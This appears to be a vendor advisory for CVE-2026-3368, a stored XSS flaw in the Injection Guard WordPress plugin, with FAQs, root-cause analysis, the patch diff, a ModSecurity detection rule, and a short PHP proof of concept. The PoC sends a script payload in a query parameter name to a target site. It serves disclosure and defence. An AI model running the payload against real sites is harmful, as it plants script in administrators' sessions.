What is CVE-2026-3368?

CVE-2026-3368 is a high-severity vulnerability in the Injection Guard plugin for WordPress, allowing unauthenticated stored cross-site scripting (XSS) via malicious query parameter names. This vulnerability arises from insufficient input sanitization and missing output escaping, enabling attackers to inject arbitrary scripts into the WordPress admin dashboard.

How does the vulnerability work?

The vulnerability works by capturing query parameters via the $_SERVER[‘QUERY_STRING’] variable, which are then processed without proper sanitization of the keys. Attackers can craft requests with XSS payloads in the query parameter names, which are stored and later rendered in the admin log without escaping, leading to script execution when an administrator views the log.

Who is affected by this vulnerability?

Any WordPress site using the Injection Guard plugin version 1.2.9 or earlier is affected by this vulnerability. Administrators can check their plugin version in the WordPress admin dashboard under the Plugins section.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Injection Guard plugin installed. If it is version 1.2.9 or earlier, your site is at risk. Additionally, review the site’s logs for unusual entries that may indicate exploitation.

What should I do to fix this vulnerability?

The recommended fix is to update the Injection Guard plugin to version 1.3.0 or later, where the vulnerability has been patched. Ensure that all plugins and themes are regularly updated to mitigate security risks.

What does the CVSS score of 7.2 mean?

A CVSS score of 7.2 indicates a high severity level, suggesting that exploitation of this vulnerability could lead to significant impacts, such as unauthorized access to sensitive information or administrative controls. Administrators should prioritize addressing vulnerabilities with high CVSS scores.

What are the practical risks of this vulnerability?

If exploited, this vulnerability can allow attackers to inject malicious JavaScript into the admin interface, potentially leading to session hijacking, administrative account takeover, or site defacement. The stored nature of the vulnerability means that any administrator who views the log could be affected.

How does the proof of concept demonstrate the issue?

The proof of concept shows how an attacker can craft a malicious URL with an XSS payload in the query parameter name. When this URL is accessed, the payload is processed and stored by the plugin, demonstrating how an unauthenticated attacker can exploit the vulnerability to execute scripts in the context of an administrator.

What are the changes made in the patched version?

In version 1.3.0, the plugin’s sanitization function was updated to sanitize both array keys and values, ensuring that malicious input cannot be stored. Additionally, output escaping was implemented throughout the admin interface to prevent script execution.

Is there a way to mitigate the risk if I cannot update immediately?

If immediate updating is not possible, consider disabling the Injection Guard plugin until it can be updated. Additionally, monitor your site’s logs for any signs of exploitation and restrict access to the admin area to trusted users only.

What is stored cross-site scripting (XSS)?

Stored cross-site scripting (XSS) occurs when an attacker is able to inject malicious scripts that are stored on the server and later executed in the browser of users who access that data. This type of vulnerability can lead to significant security issues, including data theft and unauthorized actions.

How can I secure my WordPress site against similar vulnerabilities?

To secure your WordPress site, regularly update all plugins and themes, use security plugins that monitor for vulnerabilities, implement strong user access controls, and conduct regular security audits. Educating users about safe browsing practices and potential threats is also essential.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 29, 2026

CVE-2026-3368: Injection Guard <= 1.2.9 – Unauthenticated Stored Cross-Site Scripting via Query Parameter Name (injection-guard)

CVE ID CVE-2026-3368

Plugin injection-guard

Severity High (CVSS 7.2)

CWE 79

Vulnerable Version 1.2.9

Patched Version 1.3.0

Disclosed March 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-3368:
The Injection Guard WordPress plugin version 1.2.9 and earlier contains an unauthenticated stored cross-site scripting (XSS) vulnerability. The flaw exists in the plugin’s request logging functionality, allowing attackers to inject malicious JavaScript into the WordPress admin dashboard. The vulnerability has a CVSS score of 7.2 (High).

Atomic Edge research identified the root cause as insufficient input sanitization in the `sanitize_ig_data()` function within `injection-guard/guard.php`. The function only sanitized array values using `sanitize_text_field()` but completely ignored array keys. This oversight combined with missing output escaping in the `ig_settings.php` template file. The vulnerability chain begins when the plugin captures `$_SERVER[‘QUERY_STRING’]` and applies `esc_url_raw()` which preserves URL-encoded characters. The `parse_str()` function then decodes these characters into raw HTML/JavaScript within array keys. These unsanitized keys are stored via `update_option(‘ig_requests_log’)` and later rendered without proper escaping.

The exploitation method involves sending a crafted HTTP request to any WordPress page with malicious query parameters. An attacker would encode XSS payloads in query parameter names rather than values. For example: `/?alert(document.domain)=test`. The plugin captures this via `$_SERVER[‘QUERY_STRING’]`, applies `esc_url_raw()` which preserves the encoded payload, then `parse_str()` decodes it. The malicious script executes when any administrator with appropriate privileges views the Injection Guard log page at `/wp-admin/admin.php?page=injection-guard`.

The patch in version 1.3.0 addresses multiple issues. The `sanitize_ig_data()` function now sanitizes array keys using `sanitize_key($key)` (line 15 in guard.php). The function also applies `wp_unslash()` to values before sanitization. The plugin now calls `sanitize_ig_data()` immediately after `parse_str()` (line 128). Output escaping was added throughout the admin interface: `esc_html()` for text output in ig_settings.php (lines 7, 96, 120) and `esc_attr()` for HTML attributes (lines 120, 123). The query string handling changed from `esc_url_raw()` to `wp_unslash()` (line 82).

Successful exploitation allows unauthenticated attackers to inject arbitrary JavaScript that executes in the context of WordPress administrators. This can lead to session hijacking, administrative account takeover, site defacement, or installation of backdoors. The stored nature means a single malicious request persists and affects all administrators who view the log page. Attackers could use this to create new administrator accounts, modify plugin settings, or exfiltrate sensitive data from the admin interface.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/injection-guard/guard.php
+++ b/injection-guard/guard.php
@@ -2,24 +2,52 @@


 	function sanitize_ig_data($input, $depth = 0) {
-		if ($depth > 10) return null; // Prevent too deep recursion
+
+		if ($depth > 10) {
+			return null; // prevent deep recursion
+		}

 		if (is_array($input)) {
+
 			$new_input = array();
+
 			foreach ($input as $key => $val) {
-				$clean_key = sanitize_text_field($key);
-				$new_input[$clean_key] = is_array($val) ? sanitize_ig_data($val, $depth + 1) : sanitize_text_field($val);
+
+				// sanitize array key
+				$clean_key = sanitize_key($key);
+
+				// sanitize value
+				if (is_array($val)) {
+					$new_input[$clean_key] = sanitize_ig_data($val, $depth + 1);
+				} else {
+
+					$val = sanitize_text_field(wp_unslash($val));
+
+					if (is_email($val)) {
+						$val = sanitize_email($val);
+					}
+
+					if (wp_http_validate_url($val)) {
+						$val = esc_url_raw($val);
+					}
+
+					$new_input[$clean_key] = $val;
+				}
 			}
+
 		} else {
-			$new_input = sanitize_text_field($input);

-			if (is_email($new_input)) {
-				$new_input = sanitize_email($new_input);
+			$input = sanitize_text_field(wp_unslash($input));
+
+			if (is_email($input)) {
+				$input = sanitize_email($input);
 			}

-			if (wp_http_validate_url($new_input)) {
-				$new_input = esc_url_raw($new_input);
+			if (wp_http_validate_url($input)) {
+				$input = esc_url_raw($input);
 			}
+
+			$new_input = $input;
 		}

 		return $new_input;
@@ -51,7 +79,7 @@
 	public function init(){
 		$this->request = $_REQUEST;
 		$this->request_uri = isset($_SERVER['REQUEST_URI']) ? esc_url( $_SERVER['REQUEST_URI'] ) : '';
-		$this->query_string = isset($_SERVER['QUERY_STRING']) ? esc_url_raw($_SERVER['QUERY_STRING']) : '';
+		$this->query_string = isset($_SERVER['QUERY_STRING']) ? wp_unslash($_SERVER['QUERY_STRING']) : '';
 		$this->request_uri_cleaned = $this->cleaned_uri();
 	}

@@ -97,6 +125,7 @@
 		$updated_log[$this->request_uri_cleaned] = is_array($updated_log[$this->request_uri_cleaned])?$updated_log[$this->request_uri_cleaned]:(array)$updated_log[$this->request_uri_cleaned];

 		parse_str($this->query_string, $updated_log_temp);
+		$updated_log_temp = sanitize_ig_data($updated_log_temp);
 		$time = time();

 		// $rand = rand(0, 5);
@@ -155,6 +184,10 @@

 		$updated_log = $this->get_requests_log_updated($updated_log);

+		if (count($updated_log) > 500) {
+			$updated_log = array_slice($updated_log, -500);
+		}
+
 		update_option( 'ig_requests_log', sanitize_ig_data($updated_log) );

 	}
@@ -175,6 +208,9 @@
 	}

 	public function get_requests_log(){
+		if (!current_user_can('manage_options')) {
+			return;
+		}
 		return get_option('ig_requests_log');
 	}

@@ -194,6 +230,8 @@

 		$ret = !empty($ret)?array_keys($ret):$ret;

+		$ret = sanitize_ig_data($ret);
+
 		return $ret;
 	}
 }
 No newline at end of file
--- a/injection-guard/ig_settings.php
+++ b/injection-guard/ig_settings.php
@@ -5,7 +5,7 @@
 <a title="<?php _e('Click here to download pro version','injection-guard'); ?>" style="background-color: #25bcf0;    color: #fff !important;    padding: 2px 30px;    cursor: pointer;    text-decoration: none;    font-weight: bold;    right: 0;    position: absolute;    top: 0;    box-shadow: 1px 1px #ddd;" href="https://shop.androidbubbles.com/download/" target="_blank"><?php echo __('Already a Pro Member?','injection-guard'); ?></a>
 <?php endif; ?>

-<div class="icon32" id="icon-options-general"><br></div><h2>💉 <?php echo $ig_title_v; ?> <?php if(!$ig_pro){ ?><a class="ig-gopro" target="_blank" href="<?php echo esc_url($ig_pro_link); ?>"><?php _e("Go Premium",'injection-guard'); ?></a><?php } ?></h2>
+<div class="icon32" id="icon-options-general"><br></div><h2>💉 <?php echo esc_html($ig_title_v); ?> <?php if(!$ig_pro){ ?><a class="ig-gopro" target="_blank" href="<?php echo esc_url($ig_pro_link); ?>"><?php _e("Go Premium",'injection-guard'); ?></a><?php } ?></h2>
 <hr />
 <div class="list_head">
 <a class="ig_how_link">How it works?</a>
@@ -93,7 +93,7 @@
 							<li>
 								<i class="fa fa-flag"></i> 

-								<?php echo $log_head.' ('.$count_blacklisted.'/'.count($params).')'; ?>
+								<?php echo esc_html($log_head.' ('.$count_blacklisted.'/'.count($params).')'); ?>
 								<?php if(!empty($params)): ?>

 									<ul class="mt-2">
@@ -117,11 +117,11 @@
 												?>
 												<li>
 													<div class="ig_params">
-													<input type="checkbox" data-uri="<?php echo $log_head; ?>" value="<?php echo $param_key; ?>">
-													<i class="fa fa-question-circle"></i> <?php echo $param_key; ?> | <?php echo date(get_option( 'date_format' , "F j, Y"), $param); ?>
+													<input type="checkbox" data-uri="<?php echo esc_attr($log_head); ?>" value="<?php echo esc_attr($param_key); ?>">
+													<i class="fa fa-question-circle"></i> <?php echo esc_html($param_key); ?> | <?php echo date(get_option( 'date_format' , "F j, Y"), $param); ?>
 													</div>

-													<div class="ig_actions" data-uri="<?php echo $log_head; ?>" data-val="<?php echo $param_key; ?>">
+													<div class="ig_actions" data-uri="<?php echo esc_attr($log_head); ?>" data-val="<?php echo esc_attr($param_key); ?>">

 													<?php
 													$blacklisted = (isset($ig_blacklisted[$log_head]) && in_array($param_key, $ig_blacklisted[$log_head]));
--- a/injection-guard/index.php
+++ b/injection-guard/index.php
@@ -3,7 +3,7 @@
 	Plugin Name: Injection Guard
 	Plugin URI: https://www.androidbubbles.com/extends/wordpress/plugins/injection-guard
 	Description: Blocks unauthorized and irrelevant query string requests by redirecting them to a safe error page, enhancing security without bloating your site.
-	Version: 1.2.9
+	Version: 1.3.0
 	Author: Fahad Mahmood
 	Author URI: https://www.androidbubbles.com
 	Text Domain: injection-guard
--- a/injection-guard/templates/dashboard.php
+++ b/injection-guard/templates/dashboard.php
@@ -12,14 +12,14 @@
 						if(!is_array($v)){
 			?>

-							<li><b><?php echo ucwords(str_replace('_', ' ', $k)); ?>:</b> <?php echo $v; ?></li>
+							<li><b><?php echo ucwords(str_replace('_', ' ', $k)); ?>:</b> <?php echo esc_html($v); ?></li>

 			<?php
 						}else{
 							foreach($v as $i=>$j){
 			?>

-							<li><b><?php echo ucwords(str_replace('_', ' ', $i)); ?>:</b> <?php echo $j; ?></li>
+							<li><b><?php echo ucwords(str_replace('_', ' ', $i)); ?>:</b> <?php echo esc_html($j); ?></li>

 			<?php
 							}
@@ -181,15 +181,15 @@
 			}

 ?>
-		<tr class="<?php echo $row_class; ?>">
-        	<td><?php echo $c; ?></td>
-        	<td><?php echo  get_woocommerce_currency_symbol().($amount).' ('.$orders.')'; ?></td>
-            <td><?php echo $products_list; ?></td>
-        	<td><?php echo ($customers->display_name).' - '.$customers->ID; ?></td>
-            <td><?php echo ($customers->user_email); ?></td>
-            <td><?php echo ($customers->user_registered); ?></td>
-            <td><?php echo $last_login.' / '.$the_login_date; ?></td>
-            <td><?php echo $ip_list; ?></td>
+		<tr class="<?php echo esc_attr($row_class); ?>">
+        	<td><?php echo esc_html($c); ?></td>
+        	<td><?php echo  esc_html(get_woocommerce_currency_symbol().($amount).' ('.$orders.')'); ?></td>
+            <td><?php echo esc_html($products_list); ?></td>
+        	<td><?php echo esc_html($customers->display_name).' - '.$customers->ID; ?></td>
+            <td><?php echo esc_html($customers->user_email); ?></td>
+            <td><?php echo esc_html($customers->user_registered); ?></td>
+            <td><?php echo esc_html($last_login.' / '.$the_login_date); ?></td>
+            <td><?php echo esc_html($ip_list); ?></td>
         </tr>
 <?php		//exit;

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-3368
SecRule REQUEST_URI "@streq /wp-admin/admin.php" 
  "id:1003368,phase:2,deny,status:403,chain,msg:'CVE-2026-3368: Injection Guard Stored XSS via Query Parameter Name',severity:'CRITICAL',tag:'CVE-2026-3368',tag:'WordPress',tag:'Plugin/Injection-Guard',tag:'attack-xss'"
  SecRule ARGS_GET:page "@streq injection-guard" "chain"
    SecRule REQUEST_METHOD "@streq GET" "chain"
      SecRule REQUEST_URI "@rx ?(?:[^&=]*%3C|<)(?:[^&=]*%3E|>)" 
        "t:none,t:urlDecodeUni,t:htmlEntityDecode,capture,setvar:'tx.cve_2026_3368_score=+1'"

SecRule TX:CVE_2026_3368_SCORE "@ge 1" 
  "id:2003368,phase:2,deny,status:403,msg:'CVE-2026-3368: Blocked XSS attempt in query string for Injection Guard',severity:'CRITICAL',tag:'CVE-2026-3368',tag:'WordPress',tag:'Plugin/Injection-Guard'"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-3368 - Injection Guard <= 1.2.9 - Unauthenticated Stored Cross-Site Scripting via Query Parameter Name

<?php

$target_url = "http://vulnerable-wordpress-site.com/"; // CHANGE THIS

// Craft malicious query parameter with XSS payload in the KEY (not value)
// The payload is URL-encoded to pass through esc_url_raw()
$malicious_param = urlencode('<script>alert(document.domain)</script>');
$exploit_url = $target_url . '?' . $malicious_param . '=test';

// Initialize cURL session
$ch = curl_init();

// Set cURL options
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_USERAGENT, 'Atomic-Edge-PoC/1.0');

// Execute the request to trigger the vulnerability
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Check if request was successful
if ($http_code >= 200 && $http_code < 300) {
    echo "[+] Exploit payload sent successfully to: $exploit_urln";
    echo "[+] The XSS payload is now stored in the Injection Guard log.n";
    echo "[+] When an administrator views the Injection Guard log page (/wp-admin/admin.php?page=injection-guard),n";
    echo "    the JavaScript will execute in their browser session.n";
} else {
    echo "[-] Request failed with HTTP code: $http_coden";
}

// Close cURL session
curl_close($ch);

?>

Frequently Asked Questions

What is CVE-2026-3368?
Overview of the vulnerability
CVE-2026-3368 is a high-severity vulnerability in the Injection Guard plugin for WordPress, allowing unauthenticated stored cross-site scripting (XSS) via malicious query parameter names. This vulnerability arises from insufficient input sanitization and missing output escaping, enabling attackers to inject arbitrary scripts into the WordPress admin dashboard.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability works by capturing query parameters via the $_SERVER[‘QUERY_STRING’] variable, which are then processed without proper sanitization of the keys. Attackers can craft requests with XSS payloads in the query parameter names, which are stored and later rendered in the admin log without escaping, leading to script execution when an administrator views the log.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Injection Guard plugin version 1.2.9 or earlier is affected by this vulnerability. Administrators can check their plugin version in the WordPress admin dashboard under the Plugins section.
How can I check if my site is vulnerable?
Steps to verify vulnerability
To check if your site is vulnerable, verify the version of the Injection Guard plugin installed. If it is version 1.2.9 or earlier, your site is at risk. Additionally, review the site’s logs for unusual entries that may indicate exploitation.
What should I do to fix this vulnerability?
Recommended actions
The recommended fix is to update the Injection Guard plugin to version 1.3.0 or later, where the vulnerability has been patched. Ensure that all plugins and themes are regularly updated to mitigate security risks.
What does the CVSS score of 7.2 mean?
Understanding risk levels
A CVSS score of 7.2 indicates a high severity level, suggesting that exploitation of this vulnerability could lead to significant impacts, such as unauthorized access to sensitive information or administrative controls. Administrators should prioritize addressing vulnerabilities with high CVSS scores.
What are the practical risks of this vulnerability?
Potential consequences of exploitation
If exploited, this vulnerability can allow attackers to inject malicious JavaScript into the admin interface, potentially leading to session hijacking, administrative account takeover, or site defacement. The stored nature of the vulnerability means that any administrator who views the log could be affected.
How does the proof of concept demonstrate the issue?
Understanding the exploit
The proof of concept shows how an attacker can craft a malicious URL with an XSS payload in the query parameter name. When this URL is accessed, the payload is processed and stored by the plugin, demonstrating how an unauthenticated attacker can exploit the vulnerability to execute scripts in the context of an administrator.
What are the changes made in the patched version?
Improvements in version 1.3.0
In version 1.3.0, the plugin’s sanitization function was updated to sanitize both array keys and values, ensuring that malicious input cannot be stored. Additionally, output escaping was implemented throughout the admin interface to prevent script execution.
Is there a way to mitigate the risk if I cannot update immediately?
Temporary measures
If immediate updating is not possible, consider disabling the Injection Guard plugin until it can be updated. Additionally, monitor your site’s logs for any signs of exploitation and restrict access to the admin area to trusted users only.
What is stored cross-site scripting (XSS)?
Definition and implications
Stored cross-site scripting (XSS) occurs when an attacker is able to inject malicious scripts that are stored on the server and later executed in the browser of users who access that data. This type of vulnerability can lead to significant security issues, including data theft and unauthorized actions.
How can I secure my WordPress site against similar vulnerabilities?
Best practices for WordPress security
To secure your WordPress site, regularly update all plugins and themes, use security plugins that monitor for vulnerabilities, implement strong user access controls, and conduct regular security audits. Educating users about safe browsing practices and potential threats is also essential.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations